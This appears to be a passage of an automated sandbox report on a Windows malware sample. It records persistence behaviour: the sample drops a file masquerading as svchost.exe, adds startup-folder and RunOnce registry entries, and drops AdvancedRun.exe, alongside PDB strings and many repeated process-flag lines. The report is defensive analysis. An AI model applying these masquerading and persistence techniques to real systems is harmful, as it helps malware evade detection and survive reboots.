                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdbop\RYhd( source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: QC:\Users\user\Desktop\RYhdmjjr94.PDB source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbnt source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbM source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.PythonTools.IronPython.pdbp source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\exe\Microsoft.PythonTools.IronPython.pdb" source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: *lC:\Users\user\Desktop\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: RYhdmjjr94.exe, 00000000.00000000.395776508.0000000002A20000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\exe\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.PythonTools.IronPython.pdb8 source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: mscorlib.pdb source: RYhdmjjr94.exe, 00000000.00000000.395776508.0000000002A20000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: C:\Windows\Microsoft.PythonTools.IronPython.pdbpdbhon.pdb source: RYhdmjjr94.exe, 00000000.00000000.413713809.00000000064C6000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbAJ!B source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.PythonTools.IronPython.pdb| source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32`Q source: RYhdmjjr94.exe, 00000000.00000000.413713809.00000000064C6000.00000004.00000001.sdmp
                Source: Binary string: l`C:\Windows\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: aspnet_compiler.pdb source: RYhdmjjr94.exe, 00000000.00000000.431822096.00000000029FC000.00000004.00000001.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.415482365.0000000000287000.00000002.00020000.sdmp, 36C95A71.exe, 00000018.00000000.310088788.0000000000BD7000.00000002.00020000.sdmp, 36C95A71.exe, 00000020.00000000.332330313.0000000000297000.00000002.00020000.sdmp, svchost.exe, 00000024.00000000.359855846.00000000003D7000.00000002.00020000.sdmp, svchost.exe, 00000028.00000000.381985569.0000000000717000.00000002.00020000.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdbo source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_0040B550 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_0040B550 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_0040B50D push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 6_2_0040B550 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 6_2_0040B550 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 6_2_0040B50D push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

                Persistence and Installation Behavior:

                barindex
                Drops PE files with benign system namesShow sources
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\Public\Documents\2FDD6624\svchost.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeFile created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exeJump to dropped file
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\Public\Documents\2FDD6624\svchost.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeFile created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exeJump to dropped file
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exeJump to dropped file
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeJump to dropped file
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exeJump to dropped file
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the startup folderShow sources
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeJump to dropped file
                Creates autostart registry keys with suspicious namesShow sources
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 36C95A71Jump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeJump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe\:Zone.Identifier:$DATAJump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeJump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 36C95A71Jump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 36C95A71Jump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 36C95A71Jump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 36C95A71Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
